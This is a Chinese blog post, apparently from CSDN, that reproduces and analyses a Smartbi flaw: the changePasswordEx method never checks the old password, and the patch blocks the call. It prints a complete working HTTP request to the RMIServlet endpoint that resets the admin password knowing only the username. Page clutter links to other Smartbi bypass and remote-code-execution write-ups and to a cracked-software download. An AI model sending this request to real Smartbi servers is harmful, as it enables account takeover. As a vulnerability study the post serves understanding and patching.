Smartbi 修改用户密码漏洞

已于 2024-01-06 20:03:46 修改
阅读量138 收藏
点赞数
文章标签: web安全 网络 网络安全 系统安全 计算机网络 ddos 密码学
于 2023-09-11 10:17:15 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/jennycisp/article/details/132801150
版权

漏洞简介

通过查看 Smartbi 的补丁包信息,发现存在漏洞在某种特定情况下修改用户的密码,进行简单的复现和分析

在这里插入图片描述

漏洞复现

在页面上修改密码时,需要知道原本的用户对应的密码

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

直接构造这样的数据包,就不需要知道原本的密码,知道用户名就可以修改密码

POST /smartbi/vision/RMIServlet HTTP/1.1
Host: 192.168.222.133:18080
Content-Length: 73
Cache-Control: max-age=0
If-Modified-Since: 0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Content-Type: application/x-www-form-urlencoded;charset=UTF-8
Accept: */*
Origin: http://192.168.222.133:18080
Referer: http://192.168.222.133:18080/smartbi/vision/index.jsp
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=4A4AC06EC1DF3CDDC45239C211926FA1
Connection: close

className=UserService&methodName=changePasswordEx&params=["admin","","1"]

在这里插入图片描述
在这里插入图片描述

漏洞分析

smartbi.usermanager.ILocalUserManagerModule#changePasswordEx

image

smartbi.usermanager.UserManagerModule#changePasswordEx

在这里插入图片描述

修改密码的操作虽然获取了用户名 原本的密码 修改后的新密码,但是对原本的密码并没有做任何校验处理

【----帮助网安学习,以下所有学习资料免费领!【点击领取】

① 网安学习成长路径思维导图
② 60+网安经典常用工具包
③ 100+SRC漏洞分析报告
④ 150+网安攻防实战技术电子书
⑤ 最权威CISSP 认证考试指南+题库
⑥ 超1800页CTF实战技巧手册
⑦ 最新网安大厂面试题合集(含答案)
⑧ APP客户端安全检测指南(安卓+IOS)

userId 是根据传入的用户名查询到的

smartbi.usermanager.UserManagerModule#updateUserEx

imagesmartbi.usermanager.UserManagerModule#updateUserExtend

在这里插入图片描述

漏洞修复

上传补丁包后再发送数据包,发现被拦截

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

匹配到对应的类名和方法就结束执行

朋友们如果有需要全套《黑客&网络安全入门&进阶学习资源包》,点击下方链接即可前往免费获取
CSDN大礼包:《黑客&网络安全入门&进阶学习资源包》

网络安全技术库
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
漏洞复现 || Smartbi 远程命令执行(1Day)
失心少年
07-06 2095
技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!Smartbi在远程未授权身份认证的情况下,可在绕过用户身份认证机制后未授权访问windowsunloging接口,且该接口存在反序列化远程代码执行漏洞随后可使用获取的身份凭证调用后台接口最终导致代码执行。
漏洞复现 || Smartbi内置用户登陆绕过
失心少年
07-05 638
技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!Smartbi在安装时会内置几个用户,在使用特定接口时,可绕过用户身份认证机制获取其身份凭证,随后可使用获取的身份凭证调用后台接口,可能导致敏感信息泄露和代码执行。1.利用此POC出现如下情况则存在漏洞
漏洞复现--Smartbi smartbivisionRMIServlet 接口权限绕过漏洞
qq_53003652的博客
12-18 872
Smartbi大数据分析产品融合BI定义的所有阶段,对接各种业务数据库、数据仓库和大数据分析平台,进行加工处理、分析挖掘和可视化展现,满足所有用户的各种数据分析应用需求,如大数据分析、可视化分析、探索式分析、复杂报表、应用分享等等。该产品存在接口绕过漏洞,攻击者可通过此漏洞绕过登录流程。获取到的cookie为管理用户,可直接利用进入后台。
smartbi token回调获取登录凭证漏洞(二)/smartbi token回调获取登录凭证漏洞(二)-入门攻防详细教程
程序员六七的博客
05-20 273
2023年8月8日官方又修复了一处权限绕过漏洞。该漏洞是上一个特定场景下设置Token回调地址漏洞的绕过,未经授权的攻击者可利用该漏洞,获取管理员token,完全接管管理员权限。
密码修改逻辑漏洞-前端验证
weixin_41508948的博客
08-06 1106
今天上线测试发现了一个只有前端验证的修改密码逻辑漏洞,但是该应用根本没有对验证码进行验证。 访问测试地址http://xxx.xxx.xxx.xxx:xxx/dss,查看页面功能,发现存在找回密码功能。 登陆页面 点击找回密码功能,输入内容后发现前端验证,未向后端发送数据包 找回密码 从验证码入手,看看发送验证码的情况 获取验证码 发现点击发送没有时间限制,但是不能指...
记一次,修改密码逻辑漏洞实战
m0_65247093的博客
05-26 951
目录 0x0a 状态码信息: 0x0b 漏洞本质: 0x0c 信息搜集: js白盒 0x0d 话不多少开干开干 0x01验证码绕过 0x02 截取返回包,修改状态码 0x03 修改重置密码 这里直接修改发现 提示流程错误 0x04修改状态码 0x05使用新密码登录 成功登录 漏洞已被修复,切勿骚操作。 0x0a 状态码信息: HTTP 状态码由三个十进制数字组成 响应分为五类:信息响应 (100–199),成功响应 (200–299),重定向 (300–399), ...
Smartbi报表设置文档
03-20
Smartbi报表设置文档 Smartbi报表设置文档是指使用Smartbi工具创建报表时的设置文档,该文档提供了详细...Smartbi报表设置文档提供了详细的报表设置步骤和相关知识点,它可以帮助用户更好地理解报表设置的过程和技术。
Smartbi 未授权访问漏洞.pdf
04-22
Smartbi 未授权访问漏洞.pdf
SMARTBI连接服务器做文件上传操作
09-13
在IT行业中,SMARTBI是一款广泛使用的商业智能工具,它提供了数据可视化、数据分析和报告制作等功能。在实际应用中,有时我们需要实现SMARTBI与服务器之间的文件交互,如文件上传和下载,以便于数据交换、备份或者...
smartbi破解文件
04-09
smartbi V7.02破解文件,以及可执行程序可单独联系。 smartbi V7.02破解文件,以及可执行程序可单独联系。
SmartBI数据分析师认证
01-25
4. 报表和仪表板:SmartBI提供丰富的图表类型和自定义报表功能,用户可以创建美观且直观的数据展示。掌握如何设计有效的数据可视化可以帮助传达复杂信息,使决策更迅速。 二、数据分析与挖掘 1. 探索性数据分析:...
smartbi for Excel 插件
04-19
非常好用 , 完全免费的smartbi插件. 制作smartbi必用
任意密码修改漏洞六种
weixin_66717977的博客
06-30 978
任意密码修改六种
Smartbi内置用户登陆绕过漏洞复现
0xSec
06-19 4472
Smartbi在安装时会内置几个用户,在使用特定接口时,可绕过用户身份认证机制获取其身份凭证,随后可使用获取的身份凭证调用后台接口,可能导致敏感信息泄露和代码执行。
任意密码重置漏洞
最新发布
weixin_62707591的博客
06-28 999
1. 任意密码重置漏洞原理 2. 任意密码重置漏洞产生原因 3. 任意密码重置漏洞场景 3.1 验证码爆破 3.2 验证凭证回传 3.3 验证凭证未绑是用户 3.4 跳过验证步骤 3.5 凭证可预测 3.6 同时向多个账户发送凭证 4. 任意密码重置经典案例 4.1 中国人寿某重要系统任意账户密码重置 4.2 米鼠网设计逻辑的缺陷可重置任意用户密码 5. 权限绕过漏洞 5.1 水平越权 5.2 垂直越权
Smartbi内置用户登陆绕过漏洞
holyxp的博客
07-25 690
Smartbi大数据分析产品融合BI定义的所有阶段,对接各种业务数据库、数据仓库和大数据分析平台,进行加工处理、分析挖掘和可视化展现;满足所有用户的各种数据分析应用需求,如大数据分析、可视化分析、探索式分析、复杂报表、应用分享等等。​ Smartbi在安装时会内置几个用户,在使用特定接口时,可绕过用户身份认证机制获取其身份凭证,随后可使用获取的身份凭证调用后台接口,可能导致敏感信息泄露和代码执行。
Smartbi 身份认证绕过漏洞
YJ_12340的博客
07-26 459
因为自己搭建的环境存在一些问题,可能是版本过高的原因,(奇奇怪怪的问题,用户没有权限),所以目前仅仅做概念性验证,对漏洞的原理进行分析。为什么不用原本的登录模式登录,首先原本的登录模式登录是不知道对应的账号和密码的其次我们再对原本的登录逻辑进行简单的分析。这里直接比较的是从数据库中查询出的密码,所以我们就可以直接利用内置的账号和 MD5密码登录。是从数据库中查找用户密码,根据用户密码开头的第一位字符,来进行处理比较。我们就注意到从数据库登录的操作也是不需要鉴权就可以进行访问的。
smartbi token回调获取登录凭证漏洞(二)/smartbi token回调获取登录凭证漏洞(二)-零基础白客知识点
程序员三九的博客
05-20 252
2023年8月8日官方又修复了一处权限绕过漏洞。该漏洞是上一个特定场景下设置Token回调地址漏洞的绕过,未经授权的攻击者可利用该漏洞,获取管理员token,完全接管管理员权限。
smartbi 远程命令执行漏洞
02-02
SmartBI是一种企业级的商业智能系统软件,用于数据分析和报告生成。近期,SmartBI被发现存在远程命令执行漏洞。 该漏洞的存在使得攻击者可以通过构造恶意的命令,并通过远程访问的方式执行这些命令,从而获取系统权限并进行未授权操作。这可能导致许多安全风险,包括未经授权的数据访问、敏感信息泄漏、系统瘫痪等。 远程命令执行漏洞通常是由于软件代码中的缺陷或不安全配置导致的。在SmartBI的情况下,攻击者可以通过用户输入参数中的特殊字符来注入恶意命令,由于软件没有对这些输入进行充分的验证和过滤,导致了漏洞的存在。 为了防止此类漏洞的利用,SmartBI的开发者应该加强对用户输入的验证与过滤。验证用户输入的合法性,确保输入中不包含任何潜在的恶意命令,如特殊字符、命令标识符等。此外,软件应该限制命令执行的权限,只允许执行必要的操作,并保证执行环境的安全性。 对于用户来说,应该及时更新SmartBI软件到最新版本,以获取安全补丁和修复。此外,用户在使用SmartBI时应保持警惕,避免点击不明链接、下载可疑附件,以及及时报告任何异常情况。 总之,SmartBI远程命令执行漏洞的存在给企业数据安全带来了潜在威胁。开发者需要加强软件的安全性设计和防护措施,而用户则应该保持警惕并采取合适的安全措施来最大程度地降低风险。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

网络安全技术库

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值